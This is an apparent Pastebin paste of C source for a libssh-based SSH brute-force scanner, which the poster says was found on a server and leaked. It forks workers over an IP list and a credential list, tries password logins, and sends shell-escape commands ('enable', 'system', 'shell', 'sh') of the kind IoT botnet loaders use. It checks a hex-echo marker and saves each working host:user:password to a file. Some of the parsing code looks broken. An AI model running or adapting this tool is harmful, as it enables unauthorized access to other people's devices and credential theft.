Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- // gcc ssh.c -o ssh -lssh
- // it's @kxngaroo found this on a server thought I'd leak lol.
- #include <stdio.h>
- #include <arpa/inet.h>
- #include <netinet/in.h>
- #include <string.h>
- #include <sys/socket.h>
- #include <sys/types.h>
- #include <netdb.h>
- #include <libssh/libssh.h>
- #include <stdlib.h>
- void trim_data(char *buf);
- int verify_login(ssh_session session)
- {
- ssh_channel chan;
- char read_buf[512], read_buf2[512];
- chan = ssh_channel_new(session);
- if(!chan)
- return SSH_ERROR;
- int ret = ssh_channel_open_session(chan);
- if(ret != SSH_OK)
- {
- ssh_channel_free(chan);
- return SSH_ERROR;
- }
- ret = ssh_channel_request_exec(chan, "echo -en '\\x62\\x69\\x6e\\x66\\x61\\x67\\x74'");
- if(ret != SSH_OK)
- {
- ssh_channel_close(chan);
- ssh_channel_free(chan);
- return SSH_ERROR;
- }
- int i = 0;
- int num_bytes = ssh_channel_read(chan, read_buf, sizeof(read_buf), 0);
- while(num_bytes > 0)
- {
- i = snprintf(read_buf2, sizeof(read_buf2), "%s", read_buf);
- if(i != num_bytes)
- {
- ssh_channel_close(chan);
- ssh_channel_free(chan);
- return SSH_ERROR;
- }
- num_bytes = ssh_channel_read(chan, read_buf, sizeof(read_buf), 0);
- }
- if(!strcasestr(read_buf2, "binfagt"))
- {
- ssh_channel_close(chan);
- ssh_channel_free(chan);
- ssh_channel_send_eof(chan);
- return SSH_ERROR;
- }
- ssh_channel_send_eof(chan);
- ssh_channel_close(chan);
- ssh_channel_free(chan);
- return SSH_OK;
- }
- int send_command(ssh_session session, char *command)
- {
- ssh_channel chan;
- char read_buf[512];
- chan = ssh_channel_new(session);
- if(!chan)
- return SSH_ERROR;
- int ret = ssh_channel_open_session(chan);
- if(ret != SSH_OK)
- {
- ssh_channel_free(chan);
- return SSH_ERROR;
- }
- ret = ssh_channel_request_exec(chan, command);
- if(ret != SSH_OK)
- {
- ssh_channel_close(chan);
- ssh_channel_free(chan);
- return SSH_ERROR;
- }
- ssh_channel_send_eof(chan);
- ssh_channel_close(chan);
- ssh_channel_free(chan);
- return SSH_OK;
- }
- void check_auth(char *user, char *password, char *host, char *output_name)
- {
- FILE *out;
- ssh_session session = ssh_new();
- if(!session)
- return;
- ssh_options_set(session, SSH_OPTIONS_HOST, host);
- int ret = ssh_connect(session);
- if(ret == -1)
- {
- ssh_free(session);
- return;
- }
- ret = ssh_userauth_password(session, user, password);
- if(ret != SSH_AUTH_SUCCESS)
- {
- //printf("[brute] Failed SSH attempt - %s:%s:%s\n", host, user, password);
- ssh_disconnect(session);
- ssh_free(session);
- return;
- }
- if(send_command(session, "enable") != SSH_OK)
- return;
- if(send_command(session, "system") != SSH_OK)
- return;
- if(send_command(session, "shell") != SSH_OK)
- return;
- if(send_command(session, "sh") != SSH_OK)
- return;
- /*if(send_command(session, "cat | sh") != SSH_OK)
- return;
- if(send_command(session, "ping;sh") != SSH_OK)
- return;
- if(send_command(session, "cat;sh") != SSH_OK)
- return;*/
- if(verify_login(session) != SSH_ERROR)
- {
- printf("[brute] Successful SSH attempt - %s:%s:%s\n", host, user, password);
- out = fopen(output_name, "a+");
- if(out != NULL)
- fprintf(out, "%s:%s:%s\n", host, user, password);
- }
- fclose(out);
- return;
- }
- void trim_data(char *buf)
- {
- int i = 0;
- int len = strlen(buf);
- for(i = 0; i < len; i++)
- if(buf[i] == '\n' || buf[i] == '\r')
- buf[i] = 0;
- }
- int main(int argc, char **argv)
- {
- FILE *passf;
- FILE *fp;
- char read_buf[512], read_buf2[512], *a[80196], *temp, *t, *string, *c;
- int max_forks = 0;
- int count = 0;
- int i = 0;
- int num_forks = 0;
- if(argc < 5)
- {
- printf("usage: %s [num forks] [ip list] [login list (format user pass)] [output file]\n", argv[0]);
- return 1;
- }
- if((passf = fopen(argv[3], "r")) == NULL)
- return 1;
- while(fgets(read_buf, sizeof(read_buf), passf))
- {
- trim_data(read_buf);
- while(t = strchr(read_buf, 'n'))
- *t = '.';
- temp = strtok(read_buf, " ");
- string = strdup(temp);
- a[count++] = string;
- while(temp = strtok(NULL, " "))
- {
- string = strdup(temp);
- a[count++] = string;
- }
- }
- fclose(passf);
- if((fp = fopen(argv[2], "r")) == NULL)
- return 1;
- max_forks = atoi(argv[1]);
- while(fgets(read_buf2, sizeof(read_buf2), fp))
- {
- trim_data(read_buf2);
- c = strchr(read_buf2, 'n');
- if(c != NULL)
- *c = '.';
- if(!(fork()))
- {
- check_auth(a[i], a[i+1], read_buf2, argv[4]);
- exit(0);
- }
- else
- {
- num_forks ++;
- if(num_forks++ > max_forks)
- for(num_forks; num_forks > max_forks; num_forks--)
- wait(NULL);
- }
- }
- }
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement